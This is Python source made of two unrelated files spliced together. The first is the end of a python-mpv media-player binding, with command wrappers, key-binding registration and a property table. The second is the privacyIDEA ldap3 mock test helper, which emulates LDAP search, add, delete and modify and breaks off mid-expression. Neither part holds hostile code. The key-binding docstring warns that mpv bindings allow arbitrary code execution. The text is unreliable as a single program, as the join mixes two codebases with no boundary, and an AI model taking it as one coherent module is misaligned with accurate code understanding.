            # This is necessary since otherwise the event thread would deadlock itself.
            grim_reaper = threading.Thread(target=lambda: _mpv_terminate_destroy(handle))
            grim_reaper.start()
        else:
            _mpv_terminate_destroy(handle)
            if self._event_thread:
                self._event_thread.join()

    def set_loglevel(self, level):
        """Request log messages of *level* and above on the event handle."""
        _mpv_request_log_messages(self._event_handle, level.encode('utf-8'))

    def command(self, name, *args):
        """ Execute a raw command """
        # mpv expects a NULL-terminated argv of byte strings; None args are dropped.
        args = [name.encode('utf-8')] + [ (arg if type(arg) is bytes else str(arg).encode('utf-8'))
                for arg in args if arg is not None ] + [None]
        _mpv_command(self.handle, (c_char_p*len(args))(*args))

    def seek(self, amount, reference="relative", precision="default-precise"):
        """Seek by/to *amount* seconds (or percent, depending on *reference*)."""
        self.command('seek', amount, reference, precision)

    def revert_seek(self):
        self.command('revert_seek')

    def frame_step(self):
        self.command('frame_step')

    def frame_back_step(self):
        self.command('frame_back_step')

    def _add_property(self, name, value=None):
        self.command('add_property', name, value)

    def _cycle_property(self, name, direction='up'):
        self.command('cycle_property', name, direction)

    def _multiply_property(self, name, factor):
        self.command('multiply_property', name, factor)

    def screenshot(self, includes='subtitles', mode='single'):
        self.command('screenshot', includes, mode)

    def screenshot_to_file(self, filename, includes='subtitles'):
        self.command('screenshot_to_file', filename.encode(fs_enc), includes)

    def playlist_next(self, mode='weak'):
        self.command('playlist_next', mode)

    def playlist_prev(self, mode='weak'):
        self.command('playlist_prev', mode)

    @staticmethod
    def _encode_options(options):
        """Render keyword options as mpv's "key=value,key=value" syntax."""
        return ','.join('{}={}'.format(str(key), str(val)) for key, val in options.items())

    def loadfile(self, filename, mode='replace', **options):
        self.command('loadfile', filename.encode(fs_enc), mode, MPV._encode_options(options))

    def loadlist(self, playlist, mode='replace'):
        self.command('loadlist', playlist.encode(fs_enc), mode)

    def playlist_clear(self):
        self.command('playlist_clear')

    def playlist_remove(self, index='current'):
        self.command('playlist_remove', index)

    def playlist_move(self, index1, index2):
        self.command('playlist_move', index1, index2)

    def run(self, command, *args):
        self.command('run', command, *args)

    def quit(self, code=None):
        self.command('quit', code)

    def quit_watch_later(self, code=None):
        self.command('quit_watch_later', code)

    def sub_add(self, filename):
        self.command('sub_add', filename.encode(fs_enc))

    def sub_remove(self, sub_id=None):
        self.command('sub_remove', sub_id)

    def sub_reload(self, sub_id=None):
        self.command('sub_reload', sub_id)

    def sub_step(self, skip):
        self.command('sub_step', skip)

    def sub_seek(self, skip):
        self.command('sub_seek', skip)

    def toggle_osd(self):
        self.command('osd')

    def show_text(self, string, duration='-', level=None):
        self.command('show_text', string, duration, level)

    def show_progress(self):
        self.command('show_progress')

    def discnav(self, command):
        self.command('discnav', command)

    def write_watch_later_config(self):
        self.command('write_watch_later_config')

    def overlay_add(self, overlay_id, x, y, file_or_fd, offset, fmt, w, h, stride):
        self.command('overlay_add', overlay_id, x, y, file_or_fd, offset, fmt, w, h, stride)

    def overlay_remove(self, overlay_id):
        self.command('overlay_remove', overlay_id)

    def script_message(self, *args):
        self.command('script_message', *args)

    def script_message_to(self, target, *args):
        self.command('script_message_to', target, *args)

    def observe_property(self, name, handler):
        """Register *handler* to be called whenever property *name* changes."""
        self._property_handlers[name].append(handler)
        _mpv_observe_property(self._event_handle, hash(name)&0xffffffffffffffff, name.encode('utf-8'), MpvFormat.STRING)

    def unobserve_property(self, name, handler):
        """Remove *handler*; stop observing once no handlers remain for *name*."""
        handlers = self._property_handlers[name]
        handlers.remove(handler)
        if not handlers:
            _mpv_unobserve_property(self._event_handle, hash(name)&0xffffffffffffffff)

    def register_message_handler(self, target, handler):
        self._message_handlers[target] = handler

    def unregister_message_handler(self, target):
        del self._message_handlers[target]

    def register_event_callback(self, callback):
        self._event_callbacks.append(callback)

    def unregister_event_callback(self, callback):
        self._event_callbacks.remove(callback)

    @staticmethod
    def _binding_name(callback_or_cmd):
        """Derive a stable, unique mpv section name for a binding target."""
        return 'py_kb_{:016x}'.format(hash(callback_or_cmd)&0xffffffffffffffff)

    def register_key_binding(self, keydef, callback_or_cmd, mode='force'):
        """ BIG FAT WARNING: mpv's key binding mechanism is pretty powerful. This means, you essentially get arbitrary
        code execution through key bindings. This interface makes some limited effort to sanitize the keydef given in
        the first parameter, but YOU SHOULD NOT RELY ON THIS FOR SECURITY. If your input comes from config files,
        this is completely fine--but, if you are about to pass untrusted input into this parameter, better double-check
        whether this is secure in your case. """
        # BUGFIX: the '+' separators are now escaped; unescaped they acted as
        # regex quantifiers ("Shift+" matched "Shif" followed by 1+ "t"s).
        if not re.match(r'(Shift\+)?(Ctrl\+)?(Alt\+)?(Meta\+)?(.|\w+)', keydef):
            raise ValueError('Invalid keydef. Expected format: [Shift+][Ctrl+][Alt+][Meta+]<key>\n'
                    '<key> is either the literal character the key produces (ASCII or Unicode character), or a '
                    'symbolic name (as printed by --input-keylist)')
        binding_name = MPV._binding_name(keydef)
        if callable(callback_or_cmd):
            self._key_binding_handlers[binding_name] = callback_or_cmd
            self.register_message_handler('key-binding', self._handle_key_binding_message)
            self.command('define-section',
                    binding_name, '{} script-binding py_event_handler/{}'.format(keydef, binding_name), mode)
        elif isinstance(callback_or_cmd, str):
            self.command('define-section', binding_name, '{} {}'.format(keydef, callback_or_cmd), mode)
        else:
            raise TypeError('register_key_binding expects either an str with an mpv command or a python callable.')
        self.command('enable-section', binding_name)

    def _handle_key_binding_message(self, binding_name, key_state, key_name):
        self._key_binding_handlers[binding_name](key_state, key_name)

    def unregister_key_binding(self, keydef):
        """Remove a key binding previously set up via register_key_binding."""
        binding_name = MPV._binding_name(keydef)
        self.command('disable-section', binding_name)
        self.command('define-section', binding_name, '')
        # BUGFIX: this previously tested ``callable(callback)`` where
        # ``callback`` was never defined (NameError). A python handler was
        # registered iff we stored one under this binding name.
        if binding_name in self._key_binding_handlers:
            del self._key_binding_handlers[binding_name]
            if not self._key_binding_handlers:
                self.unregister_message_handler('key-binding')

    # Convenience functions
    def play(self, filename):
        self.loadfile(filename)

    # Property accessors
    def _get_property(self, name, proptype=str, decode_str=False):
        """Fetch property *name*, converted to *proptype*; None if unavailable."""
        fmt = {int:         MpvFormat.INT64,
               float:       MpvFormat.DOUBLE,
               bool:        MpvFormat.FLAG,
               str:         MpvFormat.STRING,
               bytes:       MpvFormat.STRING,
               commalist:   MpvFormat.STRING,
               MpvFormat.NODE: MpvFormat.NODE}[proptype]

        out = cast(create_string_buffer(sizeof(c_void_p)), c_void_p)
        outptr = byref(out)
        try:
            # Raises (via ec_errcheck) on error; the int return is not needed.
            _mpv_get_property(self.handle, name.encode('utf-8'), fmt, outptr)
            rv = MpvNode.node_cast_value(outptr, fmt, decode_str or proptype in (str, commalist))

            if proptype is commalist:
                rv = proptype(rv)

            # Strings and nodes are mpv-allocated and must be handed back.
            if proptype is str:
                _mpv_free(out)
            elif proptype is MpvFormat.NODE:
                _mpv_free_node_contents(outptr)

            return rv
        except PropertyUnavailableError:
            return None

    def _set_property(self, name, value, proptype=str):
        """Set property *name* to *value*, serialized according to its type."""
        ename = name.encode('utf-8')
        if type(value) is bytes:
            _mpv_set_property_string(self.handle, ename, value)
        elif type(value) is bool:
            _mpv_set_property_string(self.handle, ename, b'yes' if value else b'no')
        elif proptype in (str, int, float):
            _mpv_set_property_string(self.handle, ename, str(proptype(value)).encode('utf-8'))
        else:
            raise TypeError('Cannot set {} property {} to value of type {}'.format(proptype, name, type(value)))

    # Dict-like option access
    def __getitem__(self, name, file_local=False):
        """ Get an option value """
        prefix = 'file-local-options/' if file_local else 'options/'
        return self._get_property(prefix+name)

    def __setitem__(self, name, value, file_local=False):
        """ Set an option value """
        prefix = 'file-local-options/' if file_local else 'options/'
        return self._set_property(prefix+name, value)

    def __iter__(self):
        """ Iterate over the names of all mpv options """
        return iter(self.options)

    def option_info(self, name):
        return self._get_property('option-info/'+name)

def commalist(propval=''):
    """Split mpv's comma-separated list property format into a list of strings."""
    text = str(propval)
    return text.split(',')

# Shorthand for structured mpv node properties used in the table below.
node = MpvFormat.NODE

# Master table of mpv properties:
#   property name -> (python type, access[, decode_str])
# access is 'r', 'w' or 'rw'.  The optional third element (node properties
# only) is forwarded to bindproperty() as decode_str.
ALL_PROPERTIES = {
        'osd-level':                    (int,    'rw'),
        'osd-scale':                    (float,  'rw'),
        'loop':                         (str,    'rw'),
        'loop-file':                    (str,    'rw'),
        'speed':                        (float,  'rw'),
        'filename':                     (bytes,  'r'),
        'file-size':                    (int,    'r'),
        'path':                         (bytes,  'r'),
        'media-title':                  (bytes,  'r'),
        'stream-pos':                   (int,    'rw'),
        'stream-end':                   (int,    'r'),
        'length':                       (float,  'r'), # deprecated for ages now
        'duration':                     (float,  'r'),
        'avsync':                       (float,  'r'),
        'total-avsync-change':          (float,  'r'),
        'drop-frame-count':             (int,    'r'),
        'percent-pos':                  (float,  'rw'),
#        'ratio-pos':                    (float,  'rw'),
        'time-pos':                     (float,  'rw'),
        'time-start':                   (float,  'r'),
        'time-remaining':               (float,  'r'),
        'playtime-remaining':           (float,  'r'),
        'chapter':                      (int,    'rw'),
        'edition':                      (int,    'rw'),
        'disc-titles':                  (int,    'r'), # NOTE(review): duplicate key -- the node entry near the end of this dict wins
        'disc-title':                   (str,    'rw'),
#        'disc-menu-active':             (bool,   'r'),
        'chapters':                     (int,    'r'),
        'editions':                     (int,    'r'),
        'angle':                        (int,    'rw'),
        'pause':                        (bool,   'rw'),
        'core-idle':                    (bool,   'r'),
        'cache':                        (int,    'r'),
        'cache-size':                   (int,    'rw'),
        'cache-free':                   (int,    'r'),
        'cache-used':                   (int,    'r'),
        'cache-speed':                  (int,    'r'),
        'cache-idle':                   (bool,   'r'),
        'cache-buffering-state':        (int,    'r'),
        'paused-for-cache':             (bool,   'r'),
#        'pause-for-cache':              (bool,   'r'),
        'eof-reached':                  (bool,   'r'),
#        'pts-association-mode':         (str,    'rw'),
        'hr-seek':                      (str,    'rw'),
        'volume':                       (float,  'rw'),
        'volume-max':                   (int,    'rw'),
        'ao-volume':                    (float,  'rw'),
        'mute':                         (bool,   'rw'),
        'ao-mute':                      (bool,   'rw'),
        'audio-speed-correction':       (float,  'r'),
        'audio-delay':                  (float,  'rw'),
        'audio-format':                 (str,    'r'),
        'audio-codec':                  (str,    'r'),
        'audio-codec-name':             (str,    'r'),
        'audio-bitrate':                (float,  'r'),
        'packet-audio-bitrate':         (float,  'r'),
        'audio-samplerate':             (int,    'r'),
        'audio-channels':               (str,    'r'),
        'aid':                          (str,    'rw'),
        'audio':                        (str,    'rw'), # alias for aid
        'balance':                      (int,    'rw'),
        'fullscreen':                   (bool,   'rw'),
        'deinterlace':                  (str,    'rw'),
        'colormatrix':                  (str,    'rw'),
        'colormatrix-input-range':      (str,    'rw'),
#        'colormatrix-output-range':     (str,    'rw'),
        'colormatrix-primaries':        (str,    'rw'),
        'ontop':                        (bool,   'rw'),
        'border':                       (bool,   'rw'),
        'framedrop':                    (str,    'rw'),
        'gamma':                        (float,  'rw'),
        'brightness':                   (int,    'rw'),
        'contrast':                     (int,    'rw'),
        'saturation':                   (int,    'rw'),
        'hue':                          (int,    'rw'),
        'hwdec':                        (str,    'rw'),
        'panscan':                      (float,  'rw'),
        'video-format':                 (str,    'r'),
        'video-codec':                  (str,    'r'),
        'video-bitrate':                (float,  'r'),
        'packet-video-bitrate':         (float,  'r'),
        'width':                        (int,    'r'),
        'height':                       (int,    'r'),
        'dwidth':                       (int,    'r'),
        'dheight':                      (int,    'r'),
        'fps':                          (float,  'r'),
        'estimated-vf-fps':             (float,  'r'),
        'window-scale':                 (float,  'rw'),
        'video-aspect':                 (str,    'rw'),
        'osd-width':                    (int,    'r'),
        'osd-height':                   (int,    'r'),
        'osd-par':                      (float,  'r'),
        'vid':                          (str,    'rw'),
        'video':                        (str,    'rw'), # alias for vid
        'video-align-x':                (float,  'rw'),
        'video-align-y':                (float,  'rw'),
        'video-pan-x':                  (float,  'rw'),
        'video-pan-y':                  (float,  'rw'),
        'video-zoom':                   (float,  'rw'),
        'video-unscaled':               (bool,   'w'),
        'video-speed-correction':       (float,  'r'),
        'program':                      (int,    'w'),
        'sid':                          (str,    'rw'),
        'sub':                          (str,    'rw'), # alias for sid
        'secondary-sid':                (str,    'rw'),
        'sub-delay':                    (float,  'rw'),
        'sub-pos':                      (int,    'rw'),
        'sub-visibility':               (bool,   'rw'),
        'sub-forced-only':              (bool,   'rw'),
        'sub-scale':                    (float,  'rw'),
        'sub-bitrate':                  (float,  'r'),
        'packet-sub-bitrate':           (float,  'r'),
#        'ass-use-margins':              (bool,   'rw'),
        'ass-vsfilter-aspect-compat':   (bool,   'rw'),
        'ass-style-override':           (bool,   'rw'),
        'stream-capture':               (str,    'rw'),
        'tv-brightness':                (int,    'rw'),
        'tv-contrast':                  (int,    'rw'),
        'tv-saturation':                (int,    'rw'),
        'tv-hue':                       (int,    'rw'),
        'playlist-pos':                 (int,    'rw'),
        'playlist-pos-1':               (int,    'rw'), # ugh.
        'playlist-count':               (int,    'r'),
#        'quvi-format':                  (str,    'rw'),
        'seekable':                     (bool,   'r'),
        'seeking':                      (bool,   'r'),
        'partially-seekable':           (bool,   'r'),
        'playback-abort':               (bool,   'r'),
        'cursor-autohide':              (str,    'rw'),
        'audio-device':                 (str,    'rw'),
        'current-vo':                   (str,    'r'),
        'current-ao':                   (str,    'r'),
        'audio-out-detected-device':    (str,    'r'),
        'protocol-list':                (str,    'r'),
        'mpv-version':                  (str,    'r'),
        'mpv-configuration':            (str,    'r'),
        'ffmpeg-version':               (str,    'r'),
        'display-sync-active':          (bool,   'r'),
        'stream-open-filename':         (bytes,   'rw'), # Undocumented
        'file-format':                  (commalist,'r'), # Be careful with this one.
        'mistimed-frame-count':         (int,    'r'),
        'vsync-ratio':                  (float,  'r'),
        'vo-drop-frame-count':          (int,    'r'),
        'vo-delayed-frame-count':       (int,    'r'),
        'playback-time':                (float,  'rw'),
        'demuxer-cache-duration':       (float,  'r'),
        'demuxer-cache-time':           (float,  'r'),
        'demuxer-cache-idle':           (bool,   'r'),
        'idle':                         (bool,   'r'),
        'disc-title-list':              (commalist,'r'),
        'field-dominance':              (str,    'rw'),
        'taskbar-progress':             (bool,   'rw'),
        'on-all-workspaces':            (bool,   'rw'),
        'video-output-levels':          (str,    'r'),
        'vo-configured':                (bool,   'r'),
        'hwdec-current':                (str,    'r'),
        'hwdec-interop':                (str,    'r'),
        'estimated-frame-count':        (int,    'r'),
        'estimated-frame-number':       (int,    'r'),
        'sub-use-margins':              (bool,   'rw'),
        'ass-force-margins':            (bool,   'rw'),
        'video-rotate':                 (str,    'rw'),
        'video-stereo-mode':            (str,    'rw'),
        'ab-loop-a':                    (str,    'r'), # What a mess...
        'ab-loop-b':                    (str,    'r'),
        'dvb-channel':                  (str,    'w'),
        'dvb-channel-name':             (str,    'rw'),
        'window-minimized':             (bool,   'r'),
        'display-names':                (commalist, 'r'),
        'display-fps':                  (float,  'r'), # access apparently misdocumented in the manpage
        'estimated-display-fps':        (float,  'r'),
        'vsync-jitter':                 (float,  'r'),
        'video-params':                 (node,   'r', True),
        'video-out-params':             (node,   'r', True),
        'track-list':                   (node,   'r', False),
        'playlist':                     (node,   'r', False),
        'chapter-list':                 (node,   'r', False),
        'vo-performance':               (node,   'r', True),
        'filtered-metadata':            (node,   'r', False),
        'metadata':                     (node,   'r', False),
        'chapter-metadata':             (node,   'r', False),
        'vf-metadata':                  (node,   'r', False),
        'af-metadata':                  (node,   'r', False),
        'edition-list':                 (node,   'r', False),
        'disc-titles':                  (node,   'r', False),
        'audio-params':                 (node,   'r', True),
        'audio-out-params':             (node,   'r', True),
        'audio-device-list':            (node,   'r', True),
        'video-frame-info':             (node,   'r', True),
        'decoder-list':                 (node,   'r', True),
        'encoder-list':                 (node,   'r', True),
        'vf':                           (node,   'r', True),
        'af':                           (node,   'r', True),
        'options':                      (node,   'r', True),
        'file-local-options':           (node,   'r', True),
        'property-list':                (commalist,'r')}

def bindproperty(MPV, name, proptype, access, decode_str=False):
    """Expose mpv property *name* as a python property on class *MPV*.

    The attribute name is *name* with dashes replaced by underscores.
    Reads/writes delegate to ``_get_property``/``_set_property``; an access
    mode without 'r' or 'w' installs a raising stub for that direction.
    """
    def barf(*args):
        raise NotImplementedError('Access denied')

    def getter(self):
        return self._get_property(name, proptype, decode_str)

    def setter(self, value):
        self._set_property(name, value, proptype)

    prop = property(getter if 'r' in access else barf,
                    setter if 'w' in access else barf)
    setattr(MPV, name.replace('-', '_'), prop)

# Generate a python property on the MPV class for every entry in
# ALL_PROPERTIES; the optional third tuple element is decode_str.
for name, (proptype, access, *args) in ALL_PROPERTIES.items():
    bindproperty(MPV, name, proptype, access, *args)


# -*- coding: utf-8 -*-
"""
2020-09-07 Cornelius Kölbel <cornelius.koelbel@netknights.it>
           Add exception
2017-04-26 Friedrich Weber <friedrich.weber@netknights.it>
           Make it possible to check for correct LDAPS/STARTTLS settings
2017-01-08 Cornelius Kölbel <cornelius.koelbel@netknights.it>
           Remove objectGUID. Since we stick with ldap3 version 2.1,
           the objectGUID is returned in a human readable format.
2016-12-05 Martin Wheldon <martin.wheldon@greenhills-it.co.uk>
           Fixed issue creating ldap entries with objectClasses defined
           Fix problem when searching for attribute values containing the
           space character.
2016-05-26 Martin Wheldon <martin.wheldon@greenhills-it.co.uk>
           Rewrite of search functionality to add recursive parsing
           of ldap search filters
           Fixed issue searching for attributes with multiple values
           Added ability to use ~= in searches
           Created unittests for mock
2016-02-19 Cornelius Kölbel <cornelius.koelbel@netknights.it>
           Add the possibility to check objectGUID
2015-01-31 Change responses.py to be able to run with SMTP
        Cornelius Kölbel <cornelius@privacyidea.org>

Original responses.py is:
Copyright 2013 Dropbox, Inc.

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

from __future__ import (
    absolute_import, division, unicode_literals
)

from passlib.hash import ldap_salted_sha1
from ast import literal_eval
import uuid
from ldap3.utils.conv import escape_bytes
import ldap3
import re
import pyparsing

from .smtpmock import get_wrapped

from collections import namedtuple, Sequence, Sized
from privacyidea.lib.utils import to_bytes, to_unicode

# File the mock "persists" directory changes to (written by add/delete/modify).
DIRECTORY = "tests/testdata/tmp_directory"

# One recorded request/response pair.
Call = namedtuple('Call', ['request', 'response'])

# Source template used by get_wrapped() to build decorator wrappers that run
# the wrapped function inside the ldap3mock context.
_wrapper_template = """\
def wrapper%(signature)s:
    with ldap3mock:
        return func%(funcargs)s
"""


def _convert_objectGUID(item):
    """Convert a textual GUID into its LDAP-escaped little-endian byte form.

    *item* is a GUID string without braces; the result is the escaped byte
    representation as produced by ldap3's escape_bytes().
    """
    guid_bytes = uuid.UUID("{{{0!s}}}".format(item)).bytes_le
    return escape_bytes(guid_bytes)


class CallList(Sequence, Sized):
    """Ordered, read-mostly record of ``Call`` objects observed by the mock."""

    def __init__(self):
        self._recorded = []

    def __iter__(self):
        return iter(self._recorded)

    def __len__(self):
        return len(self._recorded)

    def __getitem__(self, idx):
        return self._recorded[idx]

    def setdata(self, request, response):
        """Record one request/response pair."""
        self._recorded.append(Call(request, response))

    def reset(self):
        """Forget everything recorded so far."""
        self._recorded = []


class Connection(object):

    class Extend(object):
        """Mimics ldap3's ``connection.extend`` namespace object."""

        class Standard(object):
            """Mimics ``connection.extend.standard``."""

            def __init__(self, connection):
                self.connection = connection

            def paged_search(self, **kwargs):
                """Emulate a paged search by issuing one plain search.

                Note the keyword rename: callers pass ``page_size`` but the
                underlying search() receives it as ``paged_size``.
                """
                self.connection.search(search_base=kwargs.get("search_base"),
                                       search_scope=kwargs.get("search_scope"),
                                       search_filter=kwargs.get(
                                           "search_filter"),
                                       attributes=kwargs.get("attributes"),
                                       paged_size=kwargs.get("page_size"),
                                       size_limit=kwargs.get("size_limit"),
                                       paged_cookie=None)
                result = self.connection.response
                if kwargs.get("generator", False):
                    # If ``generator=True`` is passed, ``paged_search`` should return an iterator.
                    result = iter(result)
                return result

        def __init__(self, connection):
            self.standard = self.Standard(connection)

    def __init__(self, directory=None):
        """Create a mock connection over *directory* (a list of entry dicts)."""
        import copy
        if directory is None:
            directory = []
        # Keep a private deep copy so the mock never mutates the caller's
        # data structure.
        self.directory = copy.deepcopy(directory)
        self.bound = False
        self.start_tls_called = False
        self.extend = self.Extend(self)

        # Dispatch table: LDAP filter operator -> handler method.
        self.operation = {
            "!": self._search_not,
            "&": self._search_and,
            "|": self._search_or,
        }

    def set_directory(self, directory):
        """Replace the mock's directory contents.

        NOTE(review): unlike __init__, this stores the caller's list without
        a deep copy, so later mutations alias the caller's data — confirm
        this is intended.
        """
        self.directory = directory

    def _find_user(self, dn):
        """Return the index of the first entry whose "dn" equals *dn*.

        Raises StopIteration when no entry matches — callers (add/delete/
        modify) rely on catching that exception.
        """
        return next(i for (i, d) in enumerate(self.directory) if d["dn"] == dn)

    @staticmethod
    def open(read_server_info=True):
        """No-op stand-in for ldap3's Connection.open()."""
        return

    def bind(self, read_server_info=True):
        """Return the preconfigured bind outcome (``self.bound``)."""
        return self.bound

    def start_tls(self, read_server_info=True):
        """Record that STARTTLS was requested (checked by tests)."""
        self.start_tls_called = True

    def add(self, dn, object_class=None, attributes=None):
        """Add a new entry *dn* with *attributes* to the mock directory.

        Returns True on success; returns False with LDAP result code 68
        (entryAlreadyExists) if the DN is already present.  The updated
        directory is also dumped to the DIRECTORY file.
        """
        self.result = { 'dn' : '',
                        'referrals' : None,
                        'description' : 'success',
                        'result' : 0,
                        'message' : '',
                        'type' : 'addResponse'}

        # Check to see if the user exists in the directory
        try:
            self._find_user(dn)
        except StopIteration:
            # If we get here the user doesn't exist so continue.
            # Default to an empty attribute dict: the previous code stored
            # None and then crashed on ``None.update()`` when object_class
            # was given without attributes.
            entry = {'dn': dn,
                     'attributes': attributes if attributes is not None else {}}
            if object_class is not None:
                entry['attributes'].update( {'objectClass': object_class} )
        else:
            # User already exists
            self.result["description"] = "failure"
            self.result["result"] = 68
            self.result["message"] = \
                    "Error entryAlreadyExists for {0}".format(dn)
            return False

        # Add the user entry to the directory
        self.directory.append(entry)

        # Attempt to write changes to disk
        with open(DIRECTORY, 'w+') as f:
            f.write(str(self.directory))

        return True

    def delete(self, dn, controls=None):
        """Delete the entry identified by *dn* from the mock directory.

        Returns True on success; returns False with LDAP result code 32
        (noSuchObject) if the DN does not exist.  The updated directory is
        also dumped to the DIRECTORY file.
        """
        self.result = { 'dn' : '',
                        'referrals' : None,
                        'description' : 'success',
                        'result' : 0,
                        'message' : '',
                        # Fixed: this is a delete response; it was
                        # erroneously copy-pasted as 'addResponse'.
                        'type' : 'delResponse'}

        # Check to see if the user exists in the directory
        try:
            index = self._find_user(dn)
        except StopIteration:
            # If we get here the user doesn't exist so continue
            self.result["description"] = "failure"
            self.result["result"] = 32
            self.result["message"] = "Error no such object: {0}".format(dn)
            return False

        # Delete the entry object for the user
        self.directory.pop(index)

        # Attempt to write changes to disk
        with open(DIRECTORY, 'w+') as f:
            f.write(str(self.directory))

        return True

    def modify(self, dn, changes, controls=None):
        """Apply modify operations to the entry identified by *dn*.

        *changes* maps attribute name -> (operation, [values]); supported
        operations are MODIFY_DELETE, MODIFY_REPLACE and MODIFY_ADD (the
        latter two both set the attribute to the first supplied value).
        Returns True on success; returns False with LDAP result code 32
        (noSuchObject) if the DN does not exist.
        """
        self.result = { 'dn' : '',
                        'referrals' : None,
                        'description' : 'success',
                        'result' : 0,
                        'message' : '',
                        'type' : 'modifyResponse'}

        # Check to see if the user exists in the directory
        try:
            index = self._find_user(dn)
        except StopIteration:
            # If we get here the user doesn't exist so continue
            self.result["description"] = "failure"
            self.result["result"] = 32
            self.result["message"] = "Error no such object: {0!s}".format(dn)
            return False

        # extract the hash we are interested in
        entry = self.directory[index].get("attributes")

        # Loop over the changes hash and apply them
        for k, v in changes.items():
            if v[0] == "MODIFY_DELETE":
                entry.pop(k)
            elif v[0] == "MODIFY_REPLACE" or v[0] == "MODIFY_ADD":
                entry[k] = v[1][0]
            else:
                self.result["result"] = 2
                # Fixed: the two fragments previously concatenated without a
                # space ("implementedmodify"), and the message interpolated
                # k[1] (second character of the attribute name) instead of
                # the unrecognised operation itself.
                self.result["message"] = "Error bad/missing/not implemented " \
                    "modify operation: %s" % v[0]

        # Place the attributes back into the directory hash
        self.directory[index]["attributes"] = entry

        # Attempt to write changes to disk
        with open(DIRECTORY, 'w+') as f:
            f.write(str(self.directory))

        return True

    @staticmethod
    def _match_greater_than_or_equal(search_base, attribute, value, candidates):
        """Return candidates under *search_base* where str(attr) >= str(value).

        NOTE: the comparison is lexicographic on the string forms, not numeric.
        """
        matches = []
        for entry in candidates:
            if not entry.get("dn").endswith(search_base):
                continue
            directory_value = entry.get("attributes").get(attribute)
            if str(directory_value) >= str(value):
                entry["type"] = "searchResEntry"
                matches.append(entry)
        return matches

    @staticmethod
    def _match_greater_than(search_base, attribute, value, candidates):
        """Return candidates under *search_base* where str(attr) > str(value).

        NOTE: the comparison is lexicographic on the string forms, not numeric.
        """
        matches = []
        for entry in candidates:
            if not entry.get("dn").endswith(search_base):
                continue
            directory_value = entry.get("attributes").get(attribute)
            if str(directory_value) > str(value):
                entry["type"] = "searchResEntry"
                matches.append(entry)
        return matches

    @staticmethod
    def _match_less_than_or_equal(search_base, attribute, value, candidates):
        """Return candidates under *search_base* where str(attr) <= str(value).

        NOTE: the comparison is lexicographic on the string forms, not numeric.
        """
        matches = []
        for entry in candidates:
            if not entry.get("dn").endswith(search_base):
                continue
            directory_value = entry.get("attributes").get(attribute)
            if str(directory_value) <= str(value):
                entry["type"] = "searchResEntry"
                matches.append(entry)
        return matches

    @staticmethod
    def _match_less_than(search_base, attribute, value, candidates):
        """Return candidates under *search_base* where str(attr) < str(value).

        NOTE: the comparison is lexicographic on the string forms, not numeric.
        """
        matches = []
        for entry in candidates:
            if not entry.get("dn").endswith(search_base):
                continue
            directory_value = entry.get("attributes").get(attribute)
            if str(directory_value) < str(value):
                entry["type"] = "searchResEntry"
                matches.append(entry)
        return matches

    @staticmethod
    def _match_equal_to(search_base, attribute, value, candidates):
        """Return candidates under *search_base* whose *attribute* equals *value*.

        '*' in *value* switches to case-insensitive regex matching with the
        wildcard expanded to '.*' (the rest of the value is used verbatim,
        not re.escape()d).  objectGUID values are converted to their escaped
        byte form before comparison.
        """
        matches = []
        use_regex = "*" in value
        if use_regex:
            #regex = check_escape(value)
            regex = "^{0}$".format(value.replace('*', '.*'))

        for entry in candidates:
            dn = to_unicode(entry.get("dn"))

            if attribute not in entry.get("attributes") or not dn.endswith(search_base):
                continue

            directory_values = entry.get("attributes").get(attribute)
            if isinstance(directory_values, list):
                # Multi-valued attribute: the entry is appended once per
                # matching item (mirrors the original behaviour).
                for item in directory_values:
                    if attribute == "objectGUID":
                        item = _convert_objectGUID(item)
                    if use_regex:
                        if re.match(regex, str(item), re.I):
                            entry["type"] = "searchResEntry"
                            matches.append(entry)
                    elif item == value:
                        entry["type"] = "searchResEntry"
                        matches.append(entry)
            else:
                if attribute == "objectGUID":
                    directory_values = _convert_objectGUID(directory_values)
                if use_regex:
                    if re.match(regex, str(directory_values), re.I):
                        entry["type"] = "searchResEntry"
                        matches.append(entry)
                else:
                    # The value we compare against is unicode, so normalise
                    # bytes and ints from the directory to unicode first.
                    if isinstance(directory_values, bytes):
                        directory_values = directory_values.decode("utf-8")
                    elif type(directory_values) == int:
                        directory_values = u"{0!s}".format(directory_values)
                    if value == directory_values:
                        entry["type"] = "searchResEntry"
                        matches.append(entry)

        return matches

    @staticmethod
    def _match_notequal_to(search_base, attribute, value, candidates):
        """Return candidates under *search_base* whose *attribute* does NOT equal *value*.

        '*' in *value* switches to case-insensitive regex matching with the
        wildcard expanded to '.*'.  A multi-valued attribute matches only if
        none of its items equals the value.
        """
        matches = []
        use_regex = "*" in value
        if use_regex:
            #regex = check_escape(value)
            regex = "^{0}$".format(value.replace('*', '.*'))

        for entry in candidates:
            dn = entry.get("dn")

            if not dn.endswith(search_base):
                continue

            directory_values = entry.get("attributes").get(attribute)
            if isinstance(directory_values, list):
                found = False
                for item in directory_values:
                    if attribute == "objectGUID":
                        item = _convert_objectGUID(item)
                    if use_regex:
                        if re.match(regex, str(item), re.I):
                            found = True
                    elif item == value:
                        found = True
                if found is False:
                    entry["type"] = "searchResEntry"
                    matches.append(entry)
            else:
                if attribute == "objectGUID":
                    directory_values = _convert_objectGUID(directory_values)
                if use_regex:
                    if not re.match(regex, str(directory_values), re.I):
                        entry["type"] = "searchResEntry"
                        matches.append(entry)
                else:
                    if str(value) != str(directory_values):
                        entry["type"] = "searchResEntry"
                        matches.append(entry)

        return matches

    @staticmethod
    def _parse_filter():
        """Build the pyparsing grammar used to tokenize LDAP search filters.

        Returns a Forward expression parsing nested filters such as
        ``(&(objectClass=person)(uid=foo))`` into nested groups; a single
        ``(key<rel>value)`` comparison is kept as one combined token.
        """
        op = pyparsing.oneOf('! & |')
        lpar  = pyparsing.Literal('(').suppress()
        rpar  = pyparsing.Literal(')').suppress()

        k = pyparsing.Word(pyparsing.alphanums)
        # NOTE: We may need to expand on this list, but as this is not a real
        # LDAP server we should be OK.
        # Value to contain:
        #   numbers, upper/lower case letters, asterisk, at symbol, minus, full
        #   stop, backslash or a space
        v = pyparsing.Word(pyparsing.alphanums + "-*@.\\ äöü")
        rel = pyparsing.oneOf("= ~= >= <=")

        expr = pyparsing.Forward()
        atom = pyparsing.Group(lpar + op + expr + rpar) \
